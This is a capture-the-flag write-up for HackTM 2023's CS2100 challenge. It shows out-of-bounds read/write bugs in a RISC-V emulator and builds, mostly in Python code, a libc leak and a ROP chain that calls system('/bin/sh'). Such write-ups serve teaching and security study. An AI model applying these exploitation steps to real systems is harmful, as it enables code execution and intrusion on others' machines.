HackTM CTF Quals 2023: (CS2100)

Overview #

This was an interesting CTF that took place on 18 and 19 February 2023. I only solved the challenge well after the CTF was over, so what follows are the steps I would have taken to solve it during the event.

The following was the description of the provided challenge:

To all my CS2100 Computer Organisation students, I hope you've enjoyed the lectures thus far on RISC-V assembly.
 
I have set-up an online service for you to test your own RISC-V code!
Simply connect to the service through tcp:

nc 34.141.16.87 10000

Credit: Thanks to `@fmash16` for his emulator! I didn't even have to compile the emulator binary myself :O https://github.com/fmash16/riscv_emulator/blob/main/main

Initial Analysis #

The challenge provided a zip file containing the challenge files. These files can be downloaded from here: attachment.zip

The provided challenge binary is called main. Checking its protections with the checksec command shows that a stack canary, NX and PIE are all enabled, with only Partial RELRO.

checksec ./main
[*] '/home/kali/Desktop/CTFs/23/HackTM/Pwn/CS2100/chal/main'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

From the description and the provided repo, this challenge appears to be a VM that emulates RISC-V instructions. It also turns out that the provided challenge binary is a compiled version of the repo.

As a quick description, RISC-V is an ISA built around a load-store architecture, and its base instruction set uses fixed-length, 32-bit aligned instructions. The different registers and the architecture design can be found here.

Since this was a VM-based challenge, I decided to look for Out-of-Bounds (OOB) vulnerabilities. This was just a hunch, based on earlier writeups of challenges that had the same kind of bug.

Source Code Review #

The GitHub repo gives us access to the source code, which really reduced the hassle of decompiling and reversing the binary. As briefly mentioned above, RISC-V is a load-store architecture, so the key to finding the vulnerability is to look at the instructions that implement these loads and stores.

You can clone the repo to review the source code in your favourite editor. Most of the interesting code is in src/cpu.c. Skimming through the code, a CPU object with registers and a program counter is initialized.

From here, there are interesting functions named exec_LN, where N specifies the access size: Byte, Half word, Word or Double word. These functions perform a load, since they call the cpu_load function.

For example, the exec_LB function and the chain of calls beneath it are as follows:

// This function queries some registers and calls cpu_load

void exec_LB(CPU* cpu, uint32_t inst) {
    // load 1 byte to rd from address in rs1
    uint64_t imm = imm_I(inst);
    uint64_t addr = cpu->regs[rs1(inst)] + (int64_t) imm;
    cpu->regs[rd(inst)] = (int64_t)(int8_t) cpu_load(cpu, addr, 8);
    print_op("lb\n");
}

// CPU load further calls bus_load
uint64_t cpu_load(CPU* cpu, uint64_t addr, uint64_t size) {
    return bus_load(&(cpu->bus), addr, size);
}

//bus load calls dram_load
uint64_t bus_load(BUS* bus, uint64_t addr, uint64_t size) {
    return dram_load(&(bus->dram), addr, size);
}

//dram load (vulnerable code) 
uint64_t dram_load_8(DRAM* dram, uint64_t addr){
    return (uint64_t) dram->mem[addr - DRAM_BASE];
}

From the dram_load_8 source code snippet above, there is clearly an OOB read vulnerability. Nothing checks whether addr falls inside the array, and the attacker fully controls this value, so it is possible to read beyond the end of the buffer. The array is declared with DRAM_SIZE elements, as shown in the following source code snippet.

#define DRAM_SIZE 1024*1024*1
#define DRAM_BASE 0x80000000

typedef struct DRAM {
	uint8_t mem[DRAM_SIZE];     // Dram memory of DRAM_SIZE
} DRAM;

The array holds 0x100000 bytes, so if we pass, for example, 0x80100010 as addr, the index into the array will be 0x100010. That is 0x10 bytes past the end of the buffer, which gives us an OOB read (OOBR) bug.
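The arithmetic above can be checked with a few lines of Python. This is only a sketch that mirrors the two constants from the emulator source; the helper name dram_index is made up for illustration and does not exist in the repo.

```python
DRAM_SIZE = 1024 * 1024 * 1   # same constants as the emulator source
DRAM_BASE = 0x80000000

def dram_index(addr):
    """Index the emulator computes for a guest address (hypothetical helper)."""
    # The C code subtracts uint64_t values, so model the 64-bit wraparound too.
    return (addr - DRAM_BASE) & 0xFFFFFFFFFFFFFFFF

idx = dram_index(0x80100010)
print(hex(idx), "in bounds" if idx < DRAM_SIZE else "out of bounds")
```

Any address at or above DRAM_BASE + DRAM_SIZE (0x80100000) lands outside the array in this model.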

The same applies to the store instructions, which do not perform any bounds check either and therefore introduce an OOB write (OOBW) bug.

Exploitation Strategy #

Before weaponizing our exploit, we need to understand how the VM works. According to main.c, the application takes a file as its command line argument, in this case a bin file. The size of the file is determined and its contents are copied into memory. A loop then fetches each instruction read from the file and hands it to cpu_execute, which emulates it as a RISC-V instruction.


int main(int argc, char* argv[]) {
    if (argc != 2) {
        printf("Usage: rvemu <filename>\n");
        exit(1);
    }

    // Initialize cpu, registers and program counter
    struct CPU cpu;
    cpu_init(&cpu);
    // Read input file
    read_file(&cpu, argv[1]);

    // cpu loop
    while (1) {
        // fetch
        uint32_t inst = cpu_fetch(&cpu);
        // Increment the program counter
        cpu.pc += 4;
        // execute
        if (!cpu_execute(&cpu, inst))
            break;

        dump_registers(&cpu);

        if(cpu.pc==0)
            break;
    }

The cpu_execute implementation from src/cpu.c begins as follows:


int cpu_execute(CPU *cpu, uint32_t inst) {
    int opcode = inst & 0x7f;           // opcode in bits 6..0
    int funct3 = (inst >> 12) & 0x7;    // funct3 in bits 14..12
    int funct7 = (inst >> 25) & 0x7f;   // funct7 in bits 31..25

    cpu->regs[0] = 0;                   // x0 hardwired to 0 at each cycle

    /*printf("%s\n%#.8lx -> Inst: %#.8x <OpCode: %#.2x, funct3:%#x, funct7:%#x> %s",*/
            /*ANSI_YELLOW, cpu->pc-4, inst, opcode, funct3, funct7, ANSI_RESET); // DEBUG*/
    printf("%s\n%#.8lx -> %s", ANSI_YELLOW, cpu->pc-4, ANSI_RESET); // DEBUG

    switch (opcode) {
        case LUI:   exec_LUI(cpu, inst); break;
        case AUIPC: exec_AUIPC(cpu, inst); break;

This applies shifts and masks to each instruction word read from the file to extract the opcode, funct3 and funct7 fields, while the individual exec_* handlers extract the rd, rs1, rs2 and imm values. The opcode then selects which instruction is emulated.
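To make the field extraction concrete, here is a small Python sketch of the same shifts and masks. The function names decode and sign_extend are my own; the bit positions are the standard RISC-V ones used in the C snippet above.

```python
def sign_extend(value, bits):
    """Interpret the low `bits` bits of value as a two's-complement number."""
    mask = 1 << (bits - 1)
    value &= (1 << bits) - 1
    return (value ^ mask) - mask

def decode(inst):
    """Split a 32-bit RISC-V instruction word into its common fields."""
    return {
        "opcode": inst & 0x7f,             # bits 6..0
        "rd": (inst >> 7) & 0x1f,          # bits 11..7
        "funct3": (inst >> 12) & 0x7,      # bits 14..12
        "rs1": (inst >> 15) & 0x1f,        # bits 19..15
        "rs2": (inst >> 20) & 0x1f,        # bits 24..20
        "funct7": (inst >> 25) & 0x7f,     # bits 31..25
        "imm_i": sign_extend(inst >> 20, 12),  # I-type immediate, bits 31..20
    }

fields = decode(0x00210513)   # encoding of: addi a0, sp, 2
print(fields)
```

Note that rs2 and funct7 overlap the I-type immediate, so for an ADDI they are just slices of imm and carry no meaning of their own.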

Using a simple python script, we will write such instructions into a bin file, starting with a single ADDI instruction as a POC. exec_ADDI adds an immediate to the value of a register and stores the result in a register.

void exec_ADDI(CPU* cpu, uint32_t inst) {
    uint64_t imm = imm_I(inst);
    cpu->regs[rd(inst)] = cpu->regs[rs1(inst)] + (int64_t) imm;
    print_op("addi\n");
}

In src/cpu.c, this instruction is only executed when the opcode is I_TYPE (0x13) and the value of funct3 is 0x0, as defined in include/opcodes.h. The simple python script below builds an instruction word with these values.


from pwn import *

#opcodes
I_TYPE = 0x13
ADD = 0x0

# Registers 
A0 = 10
SP = 0x2


def init(opcode, funct3=0, funct7=0, rd=0, rs1=0, rs2=0):
	inst = 0
	inst |= (opcode & 0x7f)
	inst |= (funct3 & 0x7) << 12
	inst |= (funct7 & 0x7f) << 25
	inst |= (rs1 & 0x1f) << 15
	inst |= (rs2 & 0x1f) << 20
	inst |= (rd & 0x1f) << 7
	
	return inst


def exec_ADDI(opcode=I_TYPE, funct3=ADD, funct7=0, rd=0, rs1=0, rs2=0, imm=0):
	inst = init(opcode, funct3, funct7, rd, rs1, rs2)	
	inst |= (imm & 0xfff) << 20
	return inst

def main():
	payload = flat([
		exec_ADDI(rd=A0,rs1=SP, imm=2),
	])
	with open("file.bin", "wb") as fp: fp.write(payload)

if __name__ == "__main__":
	main()

The above python script writes a single encoded ADDI instruction into file.bin. When it is executed, it adds 2 to the value of the SP register passed as rs1, which is 0x80100000, and stores the result, expected to be 0x80100002, in the A0 register.
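As a quick sanity check on the encoding, the sketch below packs the same instruction without pwntools. It assumes the script above relies on pwntools' default 32-bit little-endian context when calling flat; encode_addi is a standalone helper of my own, not part of the exploit.

```python
import struct

def encode_addi(rd, rs1, imm):
    """Standalone I-type encoder for ADDI (opcode 0x13, funct3 0x0)."""
    return ((imm & 0xfff) << 20) | ((rs1 & 0x1f) << 15) | ((rd & 0x1f) << 7) | 0x13

inst = encode_addi(rd=10, rs1=2, imm=2)      # addi a0, sp, 2
raw = struct.pack("<I", inst)                # little-endian 32-bit word
print(hex(inst), raw.hex())
```

The four bytes printed here are what I would expect to find in file.bin for this one-instruction payload.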

Currently, we have no idea what lies beyond the bounds of the array or where the array is located. It could be on the stack, which would allow us to control RIP, or in an mmapped region near libc, which would allow us to overwrite a libc pointer, e.g. __malloc_hook. Using the OOBW vulnerability, we will write a value slightly beyond the array and use the debugger to find this value in memory.

Using exec_ADDI together with exec_SLLI to shift the value, we will build 0x42424242 in one of the RISC-V registers, followed by a store that writes this value beyond the array at mem[sp+0x4]. This can be done with the following python source code snippet.


def main():
    payload = flat([
        exec_ADDI(rd=A0, rs1=A0, imm=0x424),
        exec_SLLI(rd=A0, rs1=A0, imm=12),
        exec_ADDI(rd=A0, rs1=A0, imm=0x242),
        exec_SLLI(rd=A0, rs1=A0, imm=0x8),
        exec_ADDI(rd=A0, rs1=A0, imm=0x42),
        exec_SD(rs1=SP, rs2=A0, imm=0x4),  # trigger OOBW
    ])
    with open("file.bin", "wb") as fp: fp.write(payload)

Notice that since the SP register already holds 0x80100000, which corresponds to the end of the array, passing 0x4 as imm makes the store write the value of the A0 register 0x4 bytes out of bounds.
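The exec_SLLI and exec_SD helpers are not shown in the snippets here, so the following is my own minimal sketch of what they could look like, not necessarily what the full exploit uses. It follows the standard RV64I encodings: SLLI is an I-type instruction with funct3 0x1, and SD is an S-type instruction with funct3 0x3 whose immediate is split across two fields.

```python
def exec_SLLI(rd=0, rs1=0, imm=0):
    """slli rd, rs1, imm: opcode 0x13, funct3 0x1, 6-bit shift amount on RV64."""
    return (((imm & 0x3f) << 20) | ((rs1 & 0x1f) << 15) | (0x1 << 12)
            | ((rd & 0x1f) << 7) | 0x13)

def exec_SD(rs1=0, rs2=0, imm=0):
    """sd rs2, imm(rs1): opcode 0x23, funct3 0x3, imm[11:5] high, imm[4:0] low."""
    imm &= 0xfff
    return ((((imm >> 5) & 0x7f) << 25) | ((rs2 & 0x1f) << 20)
            | ((rs1 & 0x1f) << 15) | (0x3 << 12) | ((imm & 0x1f) << 7) | 0x23)

A0, SP = 10, 2
print(hex(exec_SLLI(rd=A0, rs1=A0, imm=12)))    # slli a0, a0, 12
print(hex(exec_SD(rs1=SP, rs2=A0, imm=0x4)))    # sd a0, 4(sp)
```

The keyword arguments match the way the helpers are called in the payload above, so these could be dropped into the script as-is under that assumption.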

When I ran the executable with the file.bin generated by the above python script, I received a stack smashing detected error.

This was an indicator that the mem array was indeed on the stack, and since it is declared in the main() function, the write was most likely overwriting the stack canary in main's stack frame. This is easier to see in the debugger. Load the emulator into the debugger and set a break-point in the main function right before the stack canary check, at br *main + 218.

When the break-point is hit and the stack location holding the canary at rbp - 0x8 is examined, the canary is indeed overwritten with the lower 4 bytes of the arbitrary value we wrote earlier.

The stack canary is usually followed by the saved RBP and finally the saved return address. Therefore, by adjusting the offset in mem[sp+0x4], we can come to the following conclusion.

Stack Canary (mem[sp+0x8])
RBP (mem[sp+0x10])
Saved Return Address (mem[sp+0x18])

Weaponization #

We already know the location of the array in memory and its offset from the saved return address. The OOBR will be used to leak a libc address from the stack: since we are in main's stack frame, its return address will most probably be __libc_start_main_ret. With this address we can compute the base address of libc, bypassing ASLR, and craft a ROP chain that calls system to get a shell.

NOTE: Since RISC-V uses a load-store architecture, these addresses need to be placed in specific 'registers' before being written into memory.

Leaking Addresses #

On the stack, the return address of main (saved RIP) is at mem[sp+0x18], as previously identified. The return address of main is usually a libc address inside __libc_start_main. This address can therefore be 'leaked' by loading it into one of the VM's registers.

The following python code snippet loads this address into the A0 register.

exec_LD(rd=A0, rs1=2, imm=0x18)
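The exec_LD helper is also not shown here. A minimal sketch, assuming the standard encoding of LD (I-type, LOAD opcode 0x03, funct3 0x3) and the same keyword arguments as the call above, could be:

```python
def exec_LD(rd=0, rs1=0, imm=0):
    """ld rd, imm(rs1): I-type, opcode 0x03 (LOAD), funct3 0x3."""
    return (((imm & 0xfff) << 20) | ((rs1 & 0x1f) << 15) | (0x3 << 12)
            | ((rd & 0x1f) << 7) | 0x03)

print(hex(exec_LD(rd=10, rs1=2, imm=0x18)))    # ld a0, 24(sp)
```

Since the emulator dumps its registers after every instruction, the loaded value should be visible in the A0 register in its output.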

From the debugger (on my current machine), the leaked value is the address __libc_start_call_main+122. The address of __libc_start_main is leaked_address + 0x36.

Using the exec_ADDI instruction, we will add and subtract the required values and store the result in the same A0 register. We do not use a subtract-immediate instruction because none exists in RISC-V; a constant is subtracted by adding a negative immediate. More can be read here

The following python code snippet can be used for this action.


exec_ADDI(rd=A0, rs1=A0, imm=0x36),

With the address of __libc_start_main leaked, we can now calculate the base address of libc and so bypass ASLR. The exec_ADDI instruction is used again, this time to subtract the value of libc.sym["__libc_start_main"], which is 0x271c0.

We cannot subtract the whole value 0x271c0 at once, since exec_ADDI only supports 12-bit signed immediates. We therefore need to subtract in steps that fit in 12 bits, which can be done with a loop. First we subtract 0xc0, which leaves 0x27100. A python loop that runs 0x27100//0x100 times then emits one ADDI per iteration, each subtracting 0x100.

The following python code snippet can be used for this action.

exec_ADDI(rd=A1, rs1=A0, imm=-0xc0)

for _ in range(0x27100//0x100): payload += flat(exec_ADDI(rd=A1, rs1=A1, imm=-0x100))

At this point the base address of libc is stored in the A1 register.
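The register arithmetic can be modelled in plain Python to confirm that the steps really land on the libc base. The base address below is made up purely for the demonstration, and the offsets 0x36 and 0x271c0 are the ones from my machine's libc, so they will differ elsewhere.

```python
MASK64 = (1 << 64) - 1

def addi(reg_value, imm):
    """Model ADDI: the immediate must fit in 12 signed bits."""
    assert -2048 <= imm <= 2047, "immediate does not fit in 12 bits"
    return (reg_value + imm) & MASK64

LIBC_START_MAIN = 0x271c0                   # offset quoted above, libc-specific
fake_base = 0x7ffff7c00000                  # hypothetical base for this demo
a0 = fake_base + LIBC_START_MAIN - 0x36     # stands in for the leaked address

a0 = addi(a0, 0x36)                         # now __libc_start_main
a1 = addi(a0, -0xc0)                        # strip the low 0xc0
for _ in range(0x27100 // 0x100):           # 0x271 unrolled ADDI instructions
    a1 = addi(a1, -0x100)

print(hex(a1))
```

The loop only exists in the generator script; the bin file itself contains 0x271 consecutive ADDI instructions.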

Return-Oriented-Programming Attack #

With the base address of libc, a ROP chain can be built for code execution. In the libc on my machine, the offset of libc.sym['system'] was 0x4c330. This offset was written to a chosen register, in this case A2, using the following source code snippet.

NOTE: Remember the 12-bit signed integer limit on exec_ADDI.


exec_ADDI(rd=A2, rs1=A2, imm=0x4c3),
exec_SLLI(rd=A2, rs1=A2, imm=0x8), # << 8
exec_ADDI(rd=A2, rs1=A2, imm=0x30),

With the offset of libc.sym['system'] in one register, it can be added to the libc base address and the result saved to a different 'register'. This can be done using the exec_ADD instruction, which adds the values of two 'registers'.

exec_ADD(rd=A3, rs1=A1, rs2=A2)
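For completeness, here is a sketch of how an exec_ADD helper could encode this instruction. It is my own reconstruction, assuming the standard R-type layout (opcode 0x33, funct3 0x0, funct7 0x00) and the usual ABI register numbers for A1 to A3.

```python
def exec_ADD(rd=0, rs1=0, rs2=0):
    """add rd, rs1, rs2: R-type, opcode 0x33, funct3 0x0, funct7 0x00."""
    return ((rs2 & 0x1f) << 20) | ((rs1 & 0x1f) << 15) | ((rd & 0x1f) << 7) | 0x33

A1, A2, A3 = 11, 12, 13      # x11, x12, x13 in the RISC-V ABI
print(hex(exec_ADD(rd=A3, rs1=A1, rs2=A2)))    # add a3, a1, a2
```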

After this instruction, the absolute address of system is in the A3 register. The offsets of the remaining items, the "/bin/sh" string, the pop rdi gadget and the ret gadget, were written to A4, A5 and A6 respectively with the following python code snippet:

#binsh
exec_ADDI(rd=A4, rs1=A4, imm=0x196)
exec_SLLI(rd=A4, rs1=A4, imm=0xc)
exec_ADDI(rd=A4, rs1=A4, imm=0x031)

#pop_rdi
exec_ADDI(rd=A5, rs1=A5, imm=0x277)
exec_SLLI(rd=A5, rs1=A5, imm=0x8)
exec_ADDI(rd=A5, rs1=A5, imm=0x25)

#ret
exec_ADDI(rd=A6, rs1=A6, imm=0x270)
exec_SLLI(rd=A6, rs1=A6, imm=0x8)
exec_ADDI(rd=A6, rs1=A6, imm=0xc2)
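Each addi/slli/addi triple above assumes the target register starts at zero and that both chunks stay below 0x800, otherwise the 12-bit immediate would be sign-extended. The following sketch models that behaviour so the constants can be checked offline; the helper names sext12 and build are mine.

```python
def sext12(imm):
    """Sign-extend a 12-bit immediate the way the CPU does for ADDI."""
    imm &= 0xfff
    return imm - 0x1000 if imm & 0x800 else imm

def build(hi, shift, lo):
    """Model addi/slli/addi on a register that starts at zero."""
    reg = 0
    reg += sext12(hi)     # addi rd, rd, hi
    reg <<= shift         # slli rd, rd, shift
    reg += sext12(lo)     # addi rd, rd, lo
    return reg

print(hex(build(0x4c3, 0x8, 0x30)))     # system
print(hex(build(0x196, 0xc, 0x031)))    # "/bin/sh"
print(hex(build(0x277, 0x8, 0x25)))     # pop rdi
print(hex(build(0x270, 0x8, 0xc2)))     # ret
```

A chunk such as 0x800 would come out as -0x800 in this model, which is why the offsets are split at positions where both halves stay small.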

The absolute libc addresses of the above items can then be written into the S2, S3 and S4 registers with the following python code snippet:


exec_ADD(rd=S2, rs1=A1, rs2=A4), # binsh
exec_ADD(rd=S3, rs1=A1, rs2=A5), # pop_rdi
exec_ADD(rd=S4, rs1=A1, rs2=A6), # ret

The OOBW vulnerability can now be used to overwrite the saved return address of main at mem[sp+0x18] with the above addresses held in the 'registers'. The ROP chain should have the following layout:

pop_rdi gadget + &binsh + ret gadget + &system

The above gadgets were taken from libc, with the ret gadget used to align the stack.
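To visualise where each entry of the chain ends up, the sketch below lays it out relative to sp, starting at the saved return address. The libc base is a made-up value and the offsets are the ones from my machine's libc, so treat the output as an illustration only.

```python
import struct

# Offsets quoted in this writeup; they are specific to the author's libc.
SYSTEM, BINSH, POP_RDI, RET = 0x4c330, 0x196031, 0x27725, 0x270c2

def rop_chain(libc_base):
    """Return (stack offset, value) pairs, starting at the saved return address."""
    values = [libc_base + POP_RDI, libc_base + BINSH,
              libc_base + RET, libc_base + SYSTEM]
    return [(0x18 + 8 * i, v) for i, v in enumerate(values)]

for off, val in rop_chain(0x7ffff7c00000):    # hypothetical base for this demo
    print(f"mem[sp+{off:#x}] = {val:#x}  ({struct.pack('<Q', val).hex()})")
```

Each entry is one 8-byte slot, so a single 64-bit store per slot is enough to place the whole chain.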

These addresses can be written to main’s stack using the exec_SD instruction as follows:

#overwrite values on the stack
exec_SD(rs1=SP, rs2=S3, imm=24), # pop_rdi
exec_SD(rs1=SP, rs2=S2, imm=32), # &binsh
exec_SD(rs1=SP, rs2=S4, imm=40), # ret
exec_SD(rs1=SP, rs2=A3, imm=48), # &system

The above code snippet overwrites the saved return address with the ROP chain. When the application is run with the bin file as its argument, this returns a shell for code execution.

The full exploit code can be found here exploit.py

Conclusion #

The instance hosting the challenge prevented the use of a remote shell to read the flag by redirecting stdin to /dev/null. This therefore required reading the flag directly with a command such as /bin/cat flag, which could be written into memory through the RISC-V registers and then passed to system() or execve().
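One possible way to prepare such a command, and this is an assumption on my part rather than a tested remote exploit, is to split the string into 8-byte little-endian words so that each word can be built in a register and written with a 64-bit store. The helper name command_words is hypothetical.

```python
import struct

def command_words(cmd):
    """Split a command string into little-endian 64-bit words, NUL-terminated."""
    data = cmd.encode() + b"\x00"
    data += b"\x00" * (-len(data) % 8)            # pad to a multiple of 8 bytes
    return list(struct.unpack(f"<{len(data) // 8}Q", data))

for word in command_words("/bin/cat flag"):
    print(hex(word))
```

Each word would still have to be assembled from 12-bit ADDI immediates and shifts, and a pointer to the stored string placed in rdi instead of the "/bin/sh" address.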